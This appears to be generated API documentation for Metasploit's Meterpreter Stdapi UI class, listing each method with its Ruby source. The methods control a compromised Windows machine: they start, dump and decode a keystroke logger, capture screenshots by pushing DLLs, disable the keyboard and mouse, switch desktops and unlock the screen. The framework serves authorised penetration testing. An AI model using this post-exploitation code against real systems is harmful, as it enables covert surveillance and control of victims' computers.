Class: Rex::Post::Meterpreter::Extensions::Stdapi::UI

Inherits:

UI

• Object
• UI
• Rex::Post::Meterpreter::Extensions::Stdapi::UI

Includes:

ObjectAliasesContainer

Defined in:

lib/rex/post/meterpreter/extensions/stdapi/ui.rb

Overview

Allows for interacting with the user interface on the remote machine, such as by disabling the keyboard and mouse.

WARNING:

Using keyboard and mouse enabling/disabling features will result in a DLL file being written to disk.

Instance Attribute Summary

Attributes included from ObjectAliasesContainer

#aliases

Instance Method Summary

• #disable_keyboard ⇒ Object

  Disable keyboard input on the remote machine.

• #disable_mouse ⇒ Object

  Disable mouse input on the remote machine.

• #enable_keyboard(enable = true) ⇒ Object

  Enable keyboard input on the remote machine.

• #enable_mouse(enable = true) ⇒ Object

  Enable mouse input on the remote machine.

• #enum_desktops ⇒ Object

  Enumerate desktops.

• #get_desktop ⇒ Object

  Get the current desktop meterpreter is using.

• #idle_time ⇒ Object

  Returns the number of seconds the remote machine has been idle from user input.

• #initialize(client) ⇒ UI constructor

  Initializes the post-exploitation user-interface manipulation subsystem.

• #keyscan_dump ⇒ Object

  Dump the keystroke buffer.

• #keyscan_extract(buffer_data) ⇒ Object

  Extract the keystroke from the buffer data.

• #keyscan_start ⇒ Object

  Start the keyboard sniffer.

• #keyscan_stop ⇒ Object

  Stop the keyboard sniffer.

• #screenshot(quality = 50) ⇒ Object

  Grab a screenshot of the interactive desktop.

• #set_desktop(session = -1,, station = 'WinSta0', name = 'Default', switch = false) ⇒ Object

  Change the meterpreters current desktop.

• #unlock_desktop(unlock = true) ⇒ Object

  Unlock or lock the desktop.

Methods included from ObjectAliasesContainer

#dump_alias_tree, #initialize_aliases, #method_missing

Constructor Details

#initialize(client) ⇒ UI

Initializes the post-exploitation user-interface manipulation subsystem.

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 36

def initialize(client)
	self.client = client
end

Dynamic Method Handling

This class handles dynamic methods through the method_missing method in the class Rex::Post::Meterpreter::ObjectAliasesContainer

Instance Method Details

#disable_keyboard ⇒ Object

Disable keyboard input on the remote machine.

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 49

def disable_keyboard
	return enable_keyboard(false)
end

#disable_mouse ⇒ Object

Disable mouse input on the remote machine.

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 69

def disable_mouse
	return enable_mouse(false)
end

#enable_keyboard(enable = true) ⇒ Object

Enable keyboard input on the remote machine.

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 56

def enable_keyboard(enable = true)
	request = Packet.create_request('stdapi_ui_enable_keyboard')

	request.add_tlv(TLV_TYPE_BOOL, enable)

	response = client.send_request(request)

	return true
end

#enable_mouse(enable = true) ⇒ Object

Enable mouse input on the remote machine.

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 76

def enable_mouse(enable = true)
	request = Packet.create_request('stdapi_ui_enable_mouse')

	request.add_tlv(TLV_TYPE_BOOL, enable)

	response = client.send_request(request)

	return true
end

#enum_desktops ⇒ Object

Enumerate desktops.

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 101

def enum_desktops
	request  = Packet.create_request('stdapi_ui_desktop_enum')
	response = client.send_request(request)
	desktopz = []
	if( response.result == 0 )
		response.each( TLV_TYPE_DESKTOP ) { | desktop |
		desktopz << {
				'session' => desktop.get_tlv_value( TLV_TYPE_DESKTOP_SESSION ),
				'station' => desktop.get_tlv_value( TLV_TYPE_DESKTOP_STATION ),
				'name'    => desktop.get_tlv_value( TLV_TYPE_DESKTOP_NAME )
			}
		}
	end
	return desktopz
end

#get_desktop ⇒ Object

Get the current desktop meterpreter is using.

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 120

def get_desktop
	request  = Packet.create_request( 'stdapi_ui_desktop_get' )
	response = client.send_request( request )
	desktop  = {}
	if( response.result == 0 )
		desktop = {
				'session' => response.get_tlv_value( TLV_TYPE_DESKTOP_SESSION ),
				'station' => response.get_tlv_value( TLV_TYPE_DESKTOP_STATION ),
				'name'    => response.get_tlv_value( TLV_TYPE_DESKTOP_NAME )
			}
	end
	return desktop
end

#idle_time ⇒ Object

Returns the number of seconds the remote machine has been idle from user input.

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 90

def idle_time
	request = Packet.create_request('stdapi_ui_get_idle_time')

	response = client.send_request(request)

	return response.get_tlv_value(TLV_TYPE_IDLE_TIME);
end

#keyscan_dump ⇒ Object

Dump the keystroke buffer

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 217

def keyscan_dump
	request  = Packet.create_request('stdapi_ui_get_keys')
	response = client.send_request(request)
	return response.get_tlv_value(TLV_TYPE_KEYS_DUMP);
end

#keyscan_extract(buffer_data) ⇒ Object

Extract the keystroke from the buffer data

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 226

def keyscan_extract(buffer_data)
	outp = ""
	buffer_data.unpack("n*").each do |inp|
		fl = (inp & 0xff00) >> 8
		vk = (inp & 0xff)
		kc = VirtualKeyCodes[vk]

		f_shift = fl & (1<<1)
		f_ctrl  = fl & (1<<2)
		f_alt   = fl & (1<<3)

		if(kc)
			name = ((f_shift != 0 and kc.length > 1) ? kc[1] : kc[0])
			case name
			when /^.$/
				outp << name
			when /shift|click/i
			when 'Space'
				outp << " "
			else
				outp << " <#{name}> "
			end
		else
			outp << " <0x%.2x> " % vk
		end
	end
	return outp
end

#keyscan_start ⇒ Object

Start the keyboard sniffer

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 199

def keyscan_start
	request  = Packet.create_request('stdapi_ui_start_keyscan')
	response = client.send_request(request)
	return true
end

#keyscan_stop ⇒ Object

Stop the keyboard sniffer

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 208

def keyscan_stop
	request  = Packet.create_request('stdapi_ui_stop_keyscan')
	response = client.send_request(request)
	return true
end

#screenshot(quality = 50) ⇒ Object

Grab a screenshot of the interactive desktop

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 155

def screenshot( quality=50 )
	request = Packet.create_request( 'stdapi_ui_desktop_screenshot' )
	request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY, quality )
	# include the x64 screenshot dll if the host OS is x64
	if( client.sys.config.sysinfo['Architecture'] =~ /^\S*x64\S*/ )
		screenshot_path = ::File.join( Msf::Config.install_root, 'data', 'meterpreter', 'screenshot.x64.dll' )
		screenshot_path = ::File.expand_path( screenshot_path )
		screenshot_dll  = ''
		::File.open( screenshot_path, 'rb' ) do |f|
			screenshot_dll += f.read( f.stat.size )
		end
		request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER, screenshot_dll, false, true )
		request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH, screenshot_dll.length )
	end
	# but allways include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
	screenshot_path = ::File.join( Msf::Config.install_root, 'data', 'meterpreter', 'screenshot.dll' )
	screenshot_path = ::File.expand_path( screenshot_path )
	screenshot_dll  = ''
	::File.open( screenshot_path, 'rb' ) do |f|
		screenshot_dll += f.read( f.stat.size )
	end
	request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER, screenshot_dll, false, true )
	request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_LENGTH, screenshot_dll.length )
	# send the request and return the jpeg image if successfull.
	response = client.send_request( request )
	if( response.result == 0 )
		return response.get_tlv_value( TLV_TYPE_DESKTOP_SCREENSHOT )
	end
	return nil
end

#set_desktop(session = -1,, station = 'WinSta0', name = 'Default', switch = false) ⇒ Object

Change the meterpreters current desktop. The switch param sets this new desktop as the interactive one (The local users visible desktop with screen/keyboard/mouse control).

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 139

def set_desktop( session=-1, station='WinSta0', name='Default', switch=false )
	request  = Packet.create_request( 'stdapi_ui_desktop_set' )
	request.add_tlv( TLV_TYPE_DESKTOP_SESSION, session )
	request.add_tlv( TLV_TYPE_DESKTOP_STATION, station )
	request.add_tlv( TLV_TYPE_DESKTOP_NAME, name )
	request.add_tlv( TLV_TYPE_DESKTOP_SWITCH, switch )
	response = client.send_request( request )
	if( response.result == 0 )
		return true
	end
	return false
end

#unlock_desktop(unlock = true) ⇒ Object

Unlock or lock the desktop

# File 'lib/rex/post/meterpreter/extensions/stdapi/ui.rb', line 189

def unlock_desktop(unlock=true)
	request  = Packet.create_request('stdapi_ui_unlock_desktop')
	request.add_tlv(TLV_TYPE_BOOL, unlock)
	response = client.send_request(request)
	return true
end